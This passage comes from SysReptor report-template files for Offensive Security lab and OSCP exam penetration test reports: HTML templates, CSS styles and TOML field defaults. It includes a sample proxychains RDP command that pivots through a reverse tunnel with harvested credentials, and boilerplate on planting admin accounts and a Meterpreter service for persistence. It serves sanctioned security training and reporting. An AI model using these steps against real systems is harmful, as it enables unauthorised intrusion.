<h2 id="summary" class="in-toc numbered">Objective</h2>
<markdown :text="report.objective" />
</div>
<div v-if="report.lab_network">
<h2 id="lab-network" class="in-toc numbered">Lab Network</h2>
<markdown :text="report.lab_network" />
</div>
<div>
<h2 id="finding-summary" class="in-toc numbered">Identified Vulnerabilities</h2>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<table>
<thead>
<tr>
<th>Target Name</th>
<th>IP</th>
<th align="center">CVSS</th>
<th align="center">Page</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings" class="table-row-link">
<td>
<ref :to="finding.id">{{ finding.title }}</ref>
</td>
<td>
<ref :to="finding.id">{{ finding.ip_address }}</ref>
</td>
<td align="center" :class="'risk-bg-' + finding.cvss.level">
<ref :to="finding.id">{{ finding.cvss.score }}</ref>
</td>
<td align="center">
<ref :to="finding.id" class="ref-page" />
</td>
</tr>
</tbody>
</table>
</div>
</section>
<pagebreak />
<section>
<h1 id="findings" class="in-toc numbered">Lab Network</h1>
<div v-for="finding in findings">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }} ({{ finding.ip_address }})</h2>
<table class="finding-heading">
<tr>
<td class="table-key">Score:</td>
<td align="center" :class="'risk-bg-' + finding.cvss.level">
{{ finding.cvss.score}} ({{ lodash.capitalize(finding.cvss.level) }})
</td>
</tr>
<tr>
<td class="table-key">Vector:</td>
<td>{{ finding.cvss.vector || 'n/a' }}</td>
</tr>
</table>
<div v-if="finding.initialaccess">
<h3 class="in-toc numbered">Initial Access</h3>
<markdown :text="finding.initialaccess" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation</h3>
<markdown :text="finding.postexploitation" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.exercises.length > 0">
<h1 id="coursexercises" class="in-toc numbered">Course Exercises</h1>
<div v-for="exercise in report.exercises">
<h2 class="in-toc">{{ exercise.caption }}</h2>
<markdown :text="exercise.description" />
</div>
<pagebreak />
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
--color-cover-page-bg: #E83221;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: var(--color-cover-page-bg);
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "Penetration Test Report for Internal Lab"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "Lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.exercises]
type = "list"
label = "Exercises"
origin = "custom"
required = true
[report_fields.exercises.items]
type = "object"
label = ""
origin = "custom"
[report_fields.exercises.items.properties]
[report_fields.exercises.items.properties.description]
type = "markdown"
label = "Description"
origin = "custom"
default = "TODO Adapt as required"
required = true
[report_fields.exercises.items.properties.caption]
type = "string"
label = "Title"
origin = "custom"
default = "TODO a.b.c.d Exercise (e.g. \"2.4.3.4 - Finding Files in Kali Linux\")"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "Firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.objective]
type = "markdown"
label = "Objective"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
TODO Adapt summary as required
"""
required = true
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.lab_network]
type = "markdown"
label = "Lab Network"
origin = "custom"
default = """
Offensive Security Complete Guide machines (alpha and beta) may not be included in your lab report, they are for demonstration purposes only.
For more information regarding the Bonus Points requirements, please visit the following URL: [https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide](https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide)
TODO Adapt as required
"""
required = true
[report_fields.methodology]
type = "markdown"
label = "Methodologies"
origin = "custom"
default = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found.
TODO Adapt as required
"""
required = true
[report_fields.penetration]
type = "markdown"
label = "Penetration"
origin = "custom"
default = """
The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems.
TODO Adapt as required
"""
required = true
[report_fields.report_date]
type = "date"
label = "Report Date"
origin = "custom"
required = true
[report_fields.serviceenum]
type = "markdown"
label = "Service Enumeration"
origin = "custom"
default = """
The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed.
TODO Adapt as required
"""
required = true
[report_fields.housecleaning]
type = "markdown"
label = "House Cleaning"
origin = "custom"
default = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
TODO Adapt as required
"""
required = true
[report_fields.infogathering]
type = "markdown"
label = "Information Gathering"
origin = "custom"
default = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Lab Network:**
* System-1
* System-2
* etc.
TODO Adapt as required
"""
required = true
[report_fields.maintainaccess]
type = "markdown"
label = "Maintaining Access"
origin = "custom"
default = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
TODO Adapt as required
"""
required = true
[report_fields.report_version]
type = "string"
label = "Report Version"
origin = "custom"
default = "1.0"
required = true
spellcheck = false
[report_fields.appendix_sections]
type = "list"
label = "Appendix"
origin = "custom"
required = true
[report_fields.appendix_sections.items]
type = "object"
label = ""
origin = "custom"
[report_fields.appendix_sections.items.properties]
[report_fields.appendix_sections.items.properties.title]
type = "string"
label = "Title"
origin = "custom"
default = "TODO appendix title"
required = true
spellcheck = false
[report_fields.appendix_sections.items.properties.content]
type = "markdown"
label = "Content"
origin = "custom"
default = "TODO appendix content"
required = true
[[report_sections]]
id = "Student"
label = "Student"
fields = [
"firstname",
"lastname",
"osid",
"mail",
]
[[report_sections]]
id = "other"
label = "Document Control"
fields = [
"title",
"report_date",
"report_version",
"watermark",
]
[[report_sections]]
id = "high-level_summary"
label = "High-Level Summary"
fields = [
"objective",
"lab_network",
]
[[report_sections]]
id = "methodology"
label = "Methodologies"
fields = [
"methodology",
"infogathering",
"serviceenum",
"penetration",
"maintainaccess",
"housecleaning",
]
[[report_sections]]
id = "coursexercises"
label = "Course Exercises"
fields = [
"exercises",
]
[[report_sections]]
id = "appendix"
label = "Appendix"
fields = [
"appendix_sections",
]
[finding_fields]
[finding_fields.title]
type = "string"
label = "Target Name"
origin = "core"
default = "TODO Target Name"
required = true
spellcheck = true
[finding_fields.cvss]
type = "cvss"
label = "CVSS"
origin = "core"
default = "n/a"
required = true
[finding_fields.ip_address]
type = "string"
label = "IP Address"
origin = "custom"
default = "TODO IP Address"
required = true
spellcheck = false
[finding_fields.initialaccess]
type = "markdown"
label = "Initial Access"
origin = "custom"
default = "TODO Describe initial access"
required = true
[finding_fields.postexploitation]
type = "markdown"
label = "Post Exploitation"
origin = "custom"
default = "TODO Describe post exploitation"
required = true
[finding_fields.privilegeescalation]
type = "markdown"
label = "Privilege Escalation"
origin = "custom"
default = "TODO Describe privilege escalation"
required = true
[report_preview_data]
[report_preview_data.report]
title = "Penetration Test Report for Internal Lab"
mail = "student@example.com"
osid = "OS-XXXXX"
watermark = true
methodology = "{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) utilized a widely adopted approach to perform penetration testing that is effective in testing how well the Offensive Security Labs and Exam environments are secure. Below is a breakout of how {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to identify and exploit the variety of systems and includes all individual vulnerabilities found."
penetration = "The penetration testing portions of the assessment focus heavily on gaining access to a variety of systems. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to successfully gain access to 10 out of the 50 systems."
report_date = "2022-07-29"
serviceenum = "The service enumeration portion of a penetration test focuses on gathering information about what services are alive on a system or systems. This is valuable for an attacker as it provides detailed information on potential attack vectors into a system. Understanding what applications are running on the system gives an attacker needed information before performing the actual penetration test. In some cases, some ports may not be listed."
housecleaning = """
The house cleaning portions of the assessment ensures that remnants of the penetration test are removed. Often fragments of tools or user accounts are left on an organizations computer which can cause security issues down the road. Ensuring that we are meticulous and no remnants of our penetration test are left over is important.
After the trophies on both the lab network and exam network were completed, John removed all user accounts and passwords as well as the Meterpreter services installed on the system. Offensive Security should not have to remove any user accounts or services from the system.
"""
infogathering = """
The information gathering portion of a penetration test focuses on identifying the scope of the penetration test. During this penetration test, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with exploiting the lab and exam network. The specific IP addresses were:
**Lab Network:**
* System-1
* System-2
* etc.
"""
maintainaccess = """
Maintaining access to a system is important to us as attackers, ensuring that we can get back into a system after it has been exploited is invaluable. The maintaining access phase of the penetration test focuses on ensuring that once the focused attack has occurred (i.e. a buffer overflow), we have administrative access over the system again. Many exploits may only be exploitable once and we may never be able to get back into a system after we have already performed the exploit.
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) added administrator and root level accounts on all systems compromised. In addition to the administrative/root access, a Metasploit meterpreter service was installed on the machine to ensure that additional access could be established.
"""
report_version = "1.0"
firstname = "John"
lastname = "Doe"
objective = """
{{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was tasked with performing an internal penetration test towards Offensive Security Labs. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, similar to those of a hacker and attempt to infiltrate Offensive Securitys internal lab systems the THINC.local domain. {{ report.firstname }} {{ report.lastname}}s ({{ report.osid}}) overall objective was to evaluate the network, identify systems, and exploit flaws while reporting the findings back to Offensive Security.
When performing the internal penetration test, there were several alarming vulnerabilities that were identified on Offensive Securitys network. When performing the attacks, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) was able to gain access to multiple machines, primarily due to outdated patches and poor security configurations. During the testing, {{ report.firstname }} {{ report.lastname}} ({{ report.osid}}) had administrative level access to multiple systems. All systems were successfully exploited and access granted.
TODO Adapt summary as required
"""
lab_network = """
Offensive Security Complete Guide machines (alpha and beta) may not be included in your lab report, they are for demonstration purposes only.
For more information regarding the Bonus Points requirements, please visit the following URL: https://help.offensive-security.com/hc/en-us/articles/360040165632-OSCP-Exam-Guide
TODO Adapt as required
"""
[[report_preview_data.report.appendix_sections]]
title = "Appendix Title"
content = "Appendix content"
[[report_preview_data.report.exercises]]
description = "TODO Adapt as required"
caption = "TODO a.b.c.d Exercise (e.g. \"2.4.3.4 - Finding Files in Kali Linux\")"
[[report_preview_data.report.exercises]]
description = "TODO Adapt as required"
caption = "TODO a.b.c.d Exercise (e.g. \"2.4.3.4 - Finding Files in Kali Linux\")"
[[report_preview_data.findings]]
title = "Poultry"
cvss = "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
id = "25a70e70-515e-4664-b7ab-dffc2f2fe12e"
ip_address = "10.5.5.20"
initialaccess = """
**Steps to reproduce the attack:** with the credentials at hand and a reverse tunnel established, John connected to an RDP session using proxychains accepting the certificate when prompted and entering the retrieved password afterward.
```
proxychains xfreerdp /d:sandbox /u:alex /v:10.5.5.20 +clipboard
```
"""
postexploitation = "John noticed the presence of the Thunderbird program on the users desktop, and while checking Alexs inbox he found the email from a local administrator Roger."
privilegeescalation = ""
[[assets]]
id = "f10d2665-653b-4242-93af-6da8d7a0838b"
name = "LICENSE"

923
demo_data/offsec-designs/oscp.toml Normal file
View File

@ -0,0 +1,923 @@
format = "projecttypes/v1"
id = "de0fcd3c-9548-40e2-8c48-3ab0b4b3c69b"
name = "OSCP Exam Report v1.1"
language = "en-US"
finding_field_order = [
"title",
"ip_address",
"isActiveDirectory",
"cvss",
"serviceenum",
"initialaccess",
"privilegeescalation",
"postexploitation",
]
report_template = """
<div id="footer" data-sysreptor-generated="page-footer">
<div id="footer-left"><em>CONFIDENTIAL</em></div>
<div id="footer-center">{{ report.title }}</div>
</div>
<div v-if="report.watermark" id="watermark-osid">{{ report.osid }}</div>
<section id="page-cover" data-sysreptor-generated="page-cover">
<div id="page-cover-background" />
<div id="page-cover-title">
<h1>Offensive Security</h1>
<h2>{{ report.title }}</h2>
</div>
<div id="page-cover-student">
<p id="page-cover-osid">
<strong>OSID: {{ report.osid }}</strong><br>
{{ report.mail }}<br>
</p>
<p id="page-cover-meta">
{{ formatDate(report.report_date, 'long') }}<br>
v{{ report.report_version }}
</p>
</div>
</section>
<pagebreak />
<table-of-contents id="toc" v-slot="tocItems">
<h1>Table of Contents</h1>
<ul>
<li v-for="item in tocItems" :class="'toc-level' + item.level">
<ref :to="item.id" />
</li>
</ul>
<pagebreak />
</table-of-contents>
<markdown>
# Offensive Security OSCP Exam Penetration Test Report {.in-toc.numbered}
## Introduction {.in-toc .numbered}
The Offensive Security Lab and Exam penetration test report contains all efforts that were conducted in order to pass the Offensive Security course. This report should contain all items that were used to pass the overall exam and it will be graded from a standpoint of correctness and fullness to all aspects of the exam. The purpose of this report is to ensure that the student has a full understanding of penetration testing methodologies as well as the technical knowledge to pass the qualifications for the Offensive Security Certified Professional.
## Objective {.in-toc.numbered}
The objective of this assessment is to perform an internal penetration test against the Offensive Security Lab and Exam network. The student is tasked with following methodical approach in obtaining access to the objective goals. This test should simulate an actual penetration test and how you would start from beginning to end, including the overall report. An ex-ample page has already been created for you at the latter portions of this document that should give you ample information on what is expected to pass this course. Use the sample report as a guideline to get you through the reporting.
## Requirements {.in-toc.numbered}
The student will be required to fill out this penetration testing report fully and to include the following sections:
* Overall High-Level Summary and Recommendations (non-technical)
* Methodology walkthrough and detailed outline of steps taken
* Each finding with included screenshots, walkthrough, sample code, and proof.txt if applicable.
* Any additional items that were not included
</markdown>
<pagebreak />
<section>
<h1 id="summary" class="in-toc numbered">High-Level Summary</h1>
<markdown v-if="report.highlevel_summary" :text="report.highlevel_summary" />
<div v-if="report.recommendations">
<h2 id="recommendations" class="in-toc numbered">Recommendations</h2>
<markdown :text="report.recommendations" />
</div>
<div>
<h2 id="finding-summary" class="in-toc numbered">Identified Vulnerabilities</h2>
<p>
In the course of this penetration test
<comma-and-join>
<template #critical v-if="finding_stats.count_critical > 0"><strong class="risk-critical">{{ finding_stats.count_critical }} Critical</strong></template>
<template #high v-if="finding_stats.count_high > 0"><strong class="risk-high">{{ finding_stats.count_high }} High</strong></template>
<template #medium v-if="finding_stats.count_medium > 0"><strong class="risk-medium">{{ finding_stats.count_medium }} Medium</strong></template>
<template #low v-if="finding_stats.count_low > 0"><strong class="risk-low">{{ finding_stats.count_low }} Low</strong></template>
<template #info v-if="finding_stats.count_info > 0"><strong class="risk-info">{{ finding_stats.count_info }} Info</strong></template>
</comma-and-join>
vulnerabilities were identified:
</p>
<table>
<thead>
<tr>
<th>Target Name</th>
<th>IP</th>
<th align="center">CVSS</th>
<th align="center">Page</th>
</tr>
</thead>
<tbody>
<tr v-for="finding in findings" class="table-row-link">
<td><ref :to="finding.id">{{ finding.title }}</ref></td>
<td><ref :to="finding.id">{{ finding.ip_address }}</ref></td>
<td align="center" :class="'risk-bg-' + finding.cvss.level"><ref :to="finding.id">{{ finding.cvss.score }}</ref></td>
<td align="center"><ref :to="finding.id" class="ref-page" /></td>
</tr>
</tbody>
</table>
</div>
</section>
<pagebreak />
<section>
<h1 class="in-toc numbered">Methodologies</h1>
<markdown :text="report.methodology" />
<h2 class="in-toc numbered">Information Gathering</h2>
<markdown :text="report.infogathering" />
<h2 class="in-toc numbered">Service Enumeration</h2>
<markdown :text="report.serviceenum" />
<h2 class="in-toc numbered">Penetration</h2>
<markdown :text="report.penetration" />
<h2 class="in-toc numbered">Maintaining Access</h2>
<markdown :text="report.maintainaccess" />
<h2 class="in-toc numbered">House Cleaning</h2>
<markdown :text="report.housecleaning" />
</section>
<pagebreak />
<section v-if="findings.some(f => !f.isActiveDirectory)">
<h1 id="findings" class="in-toc numbered">Independent Challenges</h1>
<div v-for="finding in findings.filter(f => !f.isActiveDirectory)">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }} ({{ finding.ip_address }})</h2>
<table class="finding-heading">
<tr>
<td class="table-key">Score:</td>
<td align="center" :class="'risk-bg-' + finding.cvss.level">
{{ finding.cvss.score}} ({{ lodash.capitalize(finding.cvss.level) }})
</td>
</tr>
<tr>
<td class="table-key">Vector:</td>
<td>{{ finding.cvss.vector || 'n/a' }}</td>
</tr>
</table>
<div v-if="finding.serviceenum">
<h3 class="in-toc numbered">Service Enumeration</h3>
<markdown :text="finding.serviceenum" />
</div>
<div v-if="finding.initialaccess">
<h3 class="in-toc numbered">Initial Access</h3>
<markdown :text="finding.initialaccess" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation</h3>
<markdown :text="finding.postexploitation" />
</div>
<pagebreak />
</div>
</section>
<section v-if="findings.some(f => f.isActiveDirectory)">
<h1 id="findingsad" class="in-toc numbered">Active Directory Set</h1>
<div v-for="finding in findings.filter(f => f.isActiveDirectory)">
<h2 :id="finding.id" class="in-toc numbered">{{ finding.title }} ({{ finding.ip_address }})</h2>
<table class="finding-heading">
<tr>
<td class="table-key">Score:</td>
<td align="center" :class="'risk-bg-' + finding.cvss.level">
{{ finding.cvss.score}} ({{ lodash.capitalize(finding.cvss.level) }})
</td>
</tr>
<tr>
<td class="table-key">Vector:</td>
<td>{{ finding.cvss.vector || 'n/a' }}</td>
</tr>
</table>
<div v-if="finding.serviceenum">
<h3 class="in-toc numbered">Service Enumeration</h3>
<markdown :text="finding.serviceenum" />
</div>
<div v-if="finding.initialaccess">
<h3 class="in-toc numbered">Initial Access</h3>
<markdown :text="finding.initialaccess" />
</div>
<div v-if="finding.privilegeescalation">
<h3 class="in-toc numbered">Privilege Escalation</h3>
<markdown :text="finding.privilegeescalation" />
</div>
<div v-if="finding.postexploitation">
<h3 class="in-toc numbered">Post-Exploitation</h3>
<markdown :text="finding.postexploitation" />
</div>
<pagebreak />
</div>
</section>
<section v-if="report.appendix_sections.length > 0" class="appendix">
<h1 id="appendix" class="in-toc numbered">Appendix</h1>
<div v-for="appendix_section in report.appendix_sections">
<h2 class="in-toc numbered">{{ appendix_section.title }}</h2>
<markdown :text="appendix_section.content" />
</div>
<pagebreak />
</section>
<section>
<div class="end-of-report">
End of Report<br>
</div>
<div class="end-of-report">
This report was rendered<br>
by <a href="https://docs.sysreptor.com/">SysReptor</a> with<br>
<span style="color:red;">&hearts;</span><br>
</div>
</section>
"""
report_styles = """
@import "/assets/global/base.css";
/* Define variables */
:root {
--color-risk-critical: #E83221;
--color-risk-high: #FF9300;
--color-risk-medium: #FFDA00;
--color-risk-low: #4285F5;
--color-risk-info: #00AE51;
}
/* Font settings */
html {
font-family: "Noto Sans", sans-serif;
font-size: 10pt;
}
/* Global styles */
@page {
size: A4 portrait;
margin: 35mm 20mm 25mm 20mm;
}
a {
font-style: italic;
text-decoration: none;
color: inherit;
}
pre code {
border: 1px solid black;
padding: 0.2em !important;
}
code {
background-color: rgb(221, 221, 221);
}
th {
background-color: #ABABAB;
font-weight: bold;
}
tr.table-row-link td {
padding: 0;
}
tr.table-row-link td a {
display: block;
padding: 0.3em;
color: inherit;
text-decoration: none;
font-style: inherit;
}
.table-key {
background-color: #ABABAB;
}
/* Classes for risk colors */
.risk-critical { color: var(--color-risk-critical) !important; font-weight: bold; }
.risk-high { color: var(--color-risk-high) !important; font-weight: bold; }
.risk-medium { color: var(--color-risk-medium) !important; font-weight: bold; }
.risk-low { color: var(--color-risk-low) !important; font-weight: bold; }
.risk-info { color: var(--color-risk-info) !important; font-weight: bold; }
.risk-bg-critical { background-color: var(--color-risk-critical) !important; color: white !important; }
.risk-bg-high { background-color: var(--color-risk-high) !important; }
.risk-bg-medium { background-color: var(--color-risk-medium) !important; }
.risk-bg-low { background-color: var(--color-risk-low) !important; }
.risk-bg-info { background-color: var(--color-risk-info) !important; }
/* Helper class for referencing page number */
.ref-page::before {
content: "" !important;
}
.ref-page::after {
content: target-counter(attr(href), page) !important;
}
.ref-page .ref-title {
display: none !important;
}
/* Table in finding chapters */
.finding-heading .table-key {
height: 3em;
width: 10em;
}
.end-of-report {
text-align:center;
font-style:italic;
margin-top:70px;
line-height:1.7;
}
/* #region footer */
@page {
@bottom-left { content: element(footer-left); }
@bottom-center { content: element(footer-center); }
@bottom-right-corner { content: counter(page); }
}
#footer #footer-left { position: running(footer-left); }
#footer #footer-center { position: running(footer-center); }
/* #endregion footer */
/* #region watermark */
#watermark-osid {
position: fixed;
top: 9cm;
left: 1cm;
transform: rotate(-45deg);
font-size: 90pt;
text-transform: uppercase;
opacity: 0.2;
}
/* #endregion watermark */
/* #region page-cover */
@page :first {
/* Footer on the cover page */
@bottom-right-corner {
content: "";
}
@bottom-right {
/* Page number */
content: counter(page);
font-size: 9pt;
color: white
}
@bottom-left {
content: "Confidential";
text-transform: uppercase;
font-style: italic;
color: white;
}
/* Pentest title should not appear on cover page */
@bottom-center {
content: '';
}
}
#page-cover-background{
position: absolute;
margin-top: -35mm;
margin-left: -20mm;
width: 210mm;
height: 297mm;
background-color: #E83221;
}
/* Title page elements */
#page-cover-title {
position: absolute;
top: 20mm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-title h1 {
font-size: 32pt;
}
#page-cover-title h2 {
font-size: 24pt;
}
#page-cover-student {
position: absolute;
top: 11cm;
left: 0;
width: 14cm;
color: #ffffff;
}
#page-cover-osid {
font-size: 14pt;
}
#page-cover-meta {
line-height: 2em;
}
/* #endregion page-cover */
/* #region toc */
#toc li {
list-style: none;
margin: 0;
padding: 0;
}
#toc .ref::before {
padding-right: 0.5em;
}
#toc .ref::after {
content: " " leader(".") " " target-counter(attr(href), page);
}
#toc .toc-level1 {
font-size: 1.5rem;
font-weight: bold;
margin-top: 0.8rem;
}
#toc .toc-level2 {
font-size: 1.2rem;
font-weight: bold;
margin-top: 0.5rem;
margin-left: 2rem;
}
#toc .toc-level3 {
font-size: 1rem;
margin-top: 0.4rem;
margin-left: 4rem;
}
#toc .toc-level4 {
font-size: 1rem;
margin-top: 0;
margin-left: 6rem;
}
/* #endregion toc */
"""
[report_fields]
[report_fields.title]
type = "string"
label = "Title"
origin = "core"
default = "OSCP Penetration Test Report"
required = true
spellcheck = true
[report_fields.mail]
type = "string"
label = "Mail"
origin = "custom"
default = "student@example.com"
required = true
spellcheck = false
[report_fields.osid]
type = "string"
label = "OSID"
origin = "custom"
default = "XXXXX"
required = true
spellcheck = false
[report_fields.lastname]
type = "string"
label = "lastname"
origin = "custom"
default = "Doe"
required = true
spellcheck = false
[report_fields.firstname]
type = "string"
label = "firstname"
origin = "custom"
default = "John"
required = true
spellcheck = false
[report_fields.watermark]
type = "boolean"
label = "Watermark"
origin = "custom"
default = false
[report_fields.methodology]
type = "markdown"
label = "Methodologies"
origin = "custom"
default = """
